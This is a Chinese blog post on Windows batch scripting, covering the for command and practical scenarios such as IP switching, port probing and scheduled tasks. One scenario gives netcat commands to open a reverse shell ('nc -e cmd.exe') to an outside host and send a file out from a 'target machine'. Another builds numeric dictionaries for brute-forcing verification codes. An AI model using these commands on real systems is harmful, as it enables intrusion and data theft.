<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="forfor [-d | -l | -r | -f] %%变量名 in (相关文件或命令) do [执行命令]这里用%%，两个百分号是批处理中书写的格式，如果是用户在命令行输入的形式，输入只需一个%号。 可以看到for有四个参数：&#x2F;d &#x2F;l &#x2F;r &#x2F;f%%变量名： 这个变量名可以是单个的大小写字母，它们区分大小写！for 会把从(set)按顺序读取到的每个值赋值给它。in 命令格式，照写就是。(相">
<meta property="og:type" content="article">
<meta property="og:title" content="关于windows下批处理的一些简单使用">
<meta property="og:url" content="https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/index.html">
<meta property="og:site_name" content="Mzzd">
<meta property="og:description" content="forfor [-d | -l | -r | -f] %%变量名 in (相关文件或命令) do [执行命令]这里用%%，两个百分号是批处理中书写的格式，如果是用户在命令行输入的形式，输入只需一个%号。 可以看到for有四个参数：&#x2F;d &#x2F;l &#x2F;r &#x2F;f%%变量名： 这个变量名可以是单个的大小写字母，它们区分大小写！for 会把从(set)按顺序读取到的每个值赋值给它。in 命令格式，照写就是。(相">
<meta property="og:image" content="https://github.com/MzzdToT/MzzdToT.github.io/raw/master/images/bat/tnc.png">
<meta property="og:image" content="https://github.com/MzzdToT/MzzdToT.github.io/raw/master/images/bat/telnet.png">
<meta property="article:published_time" content="2020-05-28T16:00:00.000Z">
<meta property="article:modified_time" content="2020-06-03T07:07:43.795Z">
<meta property="article:author" content="作者">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/MzzdToT/MzzdToT.github.io/raw/master/images/bat/tnc.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>关于windows下批处理的一些简单使用</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/MzzdToT" target="_blank" rel="noopener">项目</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" href="/2020/05/26/hydra/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&text=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&title=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&is_video=false&description=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=关于windows下批处理的一些简单使用&body=Check out this article: https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&title=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&title=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&title=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&title=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&name=关于windows下批处理的一些简单使用&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&t=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        关于windows下批处理的一些简单使用
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Mzzd</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-05-28T16:00:00.000Z" itemprop="datePublished">2020-05-29</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p><strong>for</strong><br>for [-d | -l | -r | -f] %%变量名 in (相关文件或命令) do [执行命令]<br>这里用%%，两个百分号是批处理中书写的格式，如果是用户在命令<br>行输入的形式，输入只需一个%号。</p>
<p>可以看到for有四个参数：/d /l /r /f<br>%%变量名： 这个变量名可以是单个的大小写字母，它们区分大小写！for 会把从(set)按顺序读取到的每个值赋值给它。<br>in 命令格式，照写就是。<br>(相关文件或命令)： for 把这里的值读取后赋值给变量%%variable。<br>do 命令格式，照写就是。<br>执行命令： 对每个变量的值要执行的操作，当然也可以没有任何操作，这个看实际需要。例如利用 for 循环来延迟程序，就不需要 for 执行任何操作，只需要不断循环即可。</p>
<p>1.参数/d<br>只搜索当前目录下的目录（也就是文件夹，不包括子目录）。注意：/d 无法搜索到隐藏的文件夹。<br>语法格式：for /d %%variable in (set) do command [command-parameters]<br>搜索 set（可以包含通配符和?）里的文件夹后执行指定的Command。用于目录搜索，不会搜索文件。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">::打印c盘根目录下所有文件夹</span><br><span class="line">for &#x2F;d %i in (C:\*) do @echo %i</span><br><span class="line">::把当前路径下文件夹的名字只有1-3个字母的打印出来</span><br><span class="line">for &#x2F;d %i in (???) do @echo %i</span><br></pre></td></tr></table></figure>
<p>for /d 不能匹配带隐藏属性的文件夹，在灵活性上不及 for /f 和 dir的组合；当“元素集合”中不包含任何统配符的时候，它完全是 “for %%i in (元素集合) do ……” 语句的翻版，但是又稍显复杂。感觉for /d 就是鸡肋一块。</p>
<p>2.参数/r<br>只搜索目录中（包括子目录和子目录的子目录，也就是目录树）的所有文件。这个和/d 作用互补。<br>语法格式：for /r [[drive:]path] %%variable in (set) do command[command-parameters]<br>如果在 /r 后没有指定目录，则使用当前目录。如果 set 仅为一个单点（.）字符，则枚举该目录树。<br>例如枚举C:\windows 目录树的所有文件：for /r C:\windows %%i in (.) do echo %%i</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">::打印d:\wwwroot\web1\所有文件，然后保存在d:\wwwroot\web1\1.txt</span><br><span class="line">@echo off</span><br><span class="line">for &#x2F;r d:\wwwroot\web\ %%i in (*.*) do echo %%i &gt;&gt;d:\wwwroot\web1\1.txt</span><br><span class="line">pause</span><br><span class="line">::搜索并打印c盘中所有后缀为ini的文件</span><br><span class="line">@echo off</span><br><span class="line">for &#x2F;r f:\ %%i in (nc.exe) do echo %%i</span><br><span class="line">pause</span><br></pre></td></tr></table></figure>
<p>程序列举了f盘所有目录，虽然每个目录最后都显示nc.exe，其实那不是真的存在nc.exe。之所以会这样，是因为计算机在搜索所有的目录，搜索过程伴随回显。为了只列举nc.exe存在的目录，程序应该这样写：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">for &#x2F;r f:\ %%i in (nc.exe) do if exist %%i echo %%i</span><br><span class="line">pause</span><br></pre></td></tr></table></figure>
<p>执行则只显示nc.exe存在的目录了。</p>
<p>3.参数/l<br>语法格式：for /l %%variable in (start,step,end) do command [command-parameters]<br>从 start 开始，以 step 为步长，直至最接近 end 那个整数为止，这中间有多少个整数，do 后面就执行多少次。<br>(1,1,5)将产生序列 12345，5 次重复，并依次将序列赋值到变量%%i。 (5,-1,1)将产生 54321 序列，也是 5 次重复，并依次将序列赋值到变量%%i。这个常用于循环结构。对于 in 后面括号里的三个变量，逗号隔开改为空格隔开也是可以的，不过不建议用空格隔开。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for &#x2F;l %i in (1,1,5) do start cmd</span><br></pre></td></tr></table></figure>
<p>执行后打开5个cmd窗口，/l比较好理解，下文也有具体应用场景，这里不过多赘述。</p>
<p>4.参数/f<br>/f是for循环中最复杂的一个参数。<br>用途：它能够对字符串进行操作，也能够对命令的返回值进行操作，还可以访问硬盘上的 ASCII 码文件，比如 txt 文档等。常用于文本信息编辑，如查询、提取、替换等等。</p>
<p>暂时留空</p>
<p><strong>if</strong></p>
<p>for批处理查文件</p>
<p>场景1<br><a href="https://github.com/MzzdToT/TestKit/tree/master/windowsTools" target="_blank" rel="noopener">windows nc下载</a><br>上传nc<br>nc反弹shell到公网主机1.1.1.1<br>nc -h确认是否有-e选项<br>nc -e cmd.exe 1.1.1.1 80<br>ps：有时会执行失败显示连接自动关闭，加一个-t参数可解决nc -e cmd.exe -t 1.1.1.1 80</p>
<p>nc传文件:<br>公网主机1.1.1.1监听80<br>nc -lvvp 80<br>目标机执行<br>nc -vv 1.1.1.1 80&lt;E:\test\test.bat</p>
<p>场景2<br>批处理在当前目录生成验证码字典</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">echo ****************************************</span><br><span class="line">echo *     1.输出4位数字字典                 *</span><br><span class="line">echo *     2.输出6位数字字典                 *</span><br><span class="line">echo ****************************************</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">set &#x2F;p a&#x3D;请选择</span><br><span class="line">if %a%&#x3D;&#x3D;1 goto:IV</span><br><span class="line">if %a%&#x3D;&#x3D;2 goto:VI</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">::4位字典</span><br><span class="line">:IV</span><br><span class="line">for &#x2F;l %%i in (1,1,9999) do (</span><br><span class="line">    if %%i lss 10 (echo 000%%i&gt;&gt;pass_4.txt</span><br><span class="line">    ) else (if %%i lss 100 (echo 00%%i&gt;&gt;pass_4.txt</span><br><span class="line">    ) else (if %%i lss 1000 (echo 0%%i&gt;&gt;pass_4.txt</span><br><span class="line">    ) else echo %%i&gt;&gt;pass_4.txt</span><br><span class="line">    )))</span><br><span class="line">goto:end</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">::6位字典</span><br><span class="line">:VI</span><br><span class="line">for &#x2F;l %%i in (1,1,999999) do (</span><br><span class="line">    if %%i lss 10 (echo 00000%%i&gt;&gt;pass_6.txt</span><br><span class="line">    ) else (if %%i lss 100 (echo 0000%%i&gt;&gt;pass_6.txt</span><br><span class="line">    ) else (if %%i lss 1000 (echo 000%%i&gt;&gt;pass_6.txt</span><br><span class="line">    ) else (if %%i lss 10000 (echo 00%%i&gt;&gt;pass_6.txt</span><br><span class="line">    ) else (if %%i lss 100000 (echo 0%%i&gt;&gt;pass_6.txt</span><br><span class="line">    ) else echo %%i&gt;&gt;pass_6.txt</span><br><span class="line">    )))))</span><br><span class="line">goto:end</span><br><span class="line"></span><br><span class="line">:end</span><br><span class="line">pause</span><br></pre></td></tr></table></figure>


<p>场景3<br>不使用第三方软件探测端口连通性<br>有tnc和telnet两种方式<br>tnc 模块方式。tnc 也就是 powershell 的 Test-NetConnection 模块，专门用于网络连接性测试：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell -c &quot;53,80,443 | % &#123;tnc -informationlevel Quiet baidu.com -port $_&#125;&quot;</span><br></pre></td></tr></table></figure>
<p><img src="https://github.com/MzzdToT/MzzdToT.github.io/raw/master/images/bat/tnc.png" alt="lmage"><br>显然，true即为开放，唯一不足是需要自己去找对应关系。</p>
<p>telnet 命令方式，也可用于探测端口状态：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for &#x2F;l %i in (78,1,81)do start telnet 1.1.1.1 %i &amp;timeout &#x2F;t 1&amp;taskkill &#x2F;im telnet.exe &#x2F;f</span><br></pre></td></tr></table></figure>
<p><img src="https://github.com/MzzdToT/MzzdToT.github.io/raw/master/images/bat/telnet.png" alt="lmage"><br>explain：循环访问78-81端口，超时1s就退出进程。根据实际情况可以加长超时时间。<br>但是没有powershell的tnc丝滑</p>
<p>场景4<br>一键改IP地址</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">netsh interface ip set address &quot;以太网&quot; static 10.87.225.178 255.255.255.224 10.87.225.190</span><br><span class="line">netsh interface ip set dns &quot;以太网&quot; static 10.87.13.86 primary</span><br><span class="line">netsh interface ip add dns &quot;以太网&quot; 10.87.13.87</span><br><span class="line">::右键使用管理员运行。</span><br></pre></td></tr></table></figure>
<p>ps：因为环境原因，需要时常切换网络，把要更换的地址保存起来使用方便多了。</p>
<p>场景5<br>重启资源管理器explorer以修复桌面图表显示错误问题</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">taskkill &#x2F;f &#x2F;im explorer.exe</span><br><span class="line">CD &#x2F;d %userprofile%\AppData\Local</span><br><span class="line">DEL IconCache.db &#x2F;a</span><br><span class="line">start explorer.exe</span><br></pre></td></tr></table></figure>


<p>场景6<br>批处理创建计划任务</p>
<p>方法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line"></span><br><span class="line">schtasks &#x2F;create &#x2F;tn &quot;Del-7_log&quot; &#x2F;ru system &#x2F;tr D:\aizzw\del-7.bat &#x2F;sc weekly &#x2F;d mon &#x2F;st 01:00</span><br><span class="line"></span><br><span class="line">start %systemroot%\tasks</span><br><span class="line"></span><br><span class="line">echo 创建成功，请检查...</span><br><span class="line"></span><br><span class="line">pause</span><br><span class="line"></span><br><span class="line">del &#x2F;f Create.bat</span><br></pre></td></tr></table></figure>


<p>参数解释：</p>
<p>schtasks /create 指的是创建计划任务<br>/tn 指定计划任务的名称<br>/ru　指定运行该批处理的账号，如果去掉该参数则默认为当前账户运行，会提示输入密码。<br>一个计划任务所用的账号如果密码变动后该批处理就不再会运行成功<br>所以我这里使用系统账号system，密码就省略不写。<br>/rp   指定账号的密码<br>/tr 指定程序所在路径，这里为指定要执行的批处理存放路径。<br>/sc 为指定运行的周期<br>/d 为日期.这里mon为英文单词缩写，周一<br>/st 为运行时间<br>start %systemroot%\tasks 这一句只是为了弹出计划任务窗口查看创建成功与否<br>del /f Create.bat 为创建完成后自动删除创建该计划任务的批处理</p>
<p>语法:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">schtasks&#x2F;create&#x2F;tnTaskName&#x2F;trTaskRun&#x2F;scschedule[&#x2F;momodifier][&#x2F;dday][&#x2F;mmonth[,month...][&#x2F;iIdleTime][&#x2F;stStartTime][&#x2F;sdStartDate][&#x2F;edEndDate][&#x2F;scomputer[&#x2F;u[domain\]user&#x2F;ppassword]][&#x2F;ru&#123;[Domain\]User|&quot;System&quot;&#125; [&#x2F;rpPassword]]&#x2F;?</span><br><span class="line"></span><br><span class="line">参数</span><br><span class="line"></span><br><span class="line">&#x2F;tnTaskName </span><br><span class="line"></span><br><span class="line">指定任务的名称。 </span><br><span class="line"></span><br><span class="line">&#x2F;trTaskRun </span><br><span class="line"></span><br><span class="line">指定任务运行的程序或命令。键入可执行文件、脚本文件或批处理文件的完全合格的路径和文件名。如果忽略该路径，SchTasks.exe 将假定文件在Systemroot\System32 目录下。 </span><br><span class="line"></span><br><span class="line">&#x2F;scschedule </span><br><span class="line"></span><br><span class="line">指定计划类型。有效值为 MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY、ONCE、ONSTART、ONLOGON、ONIDLE。 值 说明 </span><br><span class="line"></span><br><span class="line">MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY 指定计划的时间单位。 </span><br><span class="line"></span><br><span class="line">ONCE 任务在指定的日期和时间运行一次。 </span><br><span class="line"></span><br><span class="line">ONSTART 任务在每次系统启动的时候运行。可以指定启动的日期，或下一次系统启动的时候运行任务。 </span><br><span class="line"></span><br><span class="line">ONLOGON 每当用户（任意用户）登录的时候，任务就运行。可以指定日期，或在下次用户登录的时候运行任务。 </span><br><span class="line"></span><br><span class="line">ONIDLE 只要系统空闲了指定的时间，任务就运行。可以指定日期，或在下次系统空闲的时候运行任务。</span><br><span class="line"></span><br><span class="line">&#x2F;momodifier </span><br><span class="line"></span><br><span class="line">指定任务在其计划类型内的运行频率。这个参数对于 MONTHLY 计划是必需的。对于 MINUTE、HOURLY、DAILY 或 WEEKLY 计划，这个参数有效，但也可选。默认值为 1。 计划类型 修饰符 说明 </span><br><span class="line"></span><br><span class="line">MINUTE 1～1439 任务每n分钟运行一次。 </span><br><span class="line"></span><br><span class="line">HOURLY 1～23 任务每n小时运行一次。 </span><br><span class="line"></span><br><span class="line">DAILY 1～365 任务每n天运行一次。 </span><br><span class="line"></span><br><span class="line">WEEKLY 1～52 任务每n周运行一次。 </span><br><span class="line"></span><br><span class="line">MONTHLY 1～12 任务每n月运行一次。 </span><br><span class="line"></span><br><span class="line">LASTDAY 任务在月份的最后一天运行。 </span><br><span class="line"></span><br><span class="line">FIRST、SECOND、THIRD、FOURTH、LAST 与&#x2F;dday参数共同使用,并在特定的周和天运行任务。例如，在月份的第三个周三。</span><br></pre></td></tr></table></figure>

<p>例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">E:\sqlmap</span><br><span class="line">λ schtasks &#x2F;create &#x2F;tn &quot;gaowei_scan&quot; &#x2F;tr c:\Users\Hasee\Desktop\3.py &#x2F;sc minute &#x2F;mo 30</span><br><span class="line">成功: 成功创建计划任务 &quot;gaowei_scan&quot;。</span><br><span class="line">#每30分钟运行一次3.py</span><br><span class="line"></span><br><span class="line">schtasks</span><br><span class="line">#查看所有计划任务</span><br><span class="line"></span><br><span class="line">E:\sqlmap</span><br><span class="line">λ schtasks &#x2F;delete &#x2F;TN gaowei_scan &#x2F;f</span><br><span class="line">成功: 计划的任务 &quot;gaowei_scan&quot; 被成功删除。</span><br></pre></td></tr></table></figure>
  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/MzzdToT" target="_blank" rel="noopener">项目</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&text=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&title=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&is_video=false&description=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=关于windows下批处理的一些简单使用&body=Check out this article: https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&title=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&title=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&title=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&title=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&name=关于windows下批处理的一些简单使用&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://mzzdtot.github.io/2020/05/29/windows%E6%89%B9%E5%A4%84%E7%90%86/&t=关于windows下批处理的一些简单使用" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2020
    作者
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/MzzdToT" target="_blank" rel="noopener">项目</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
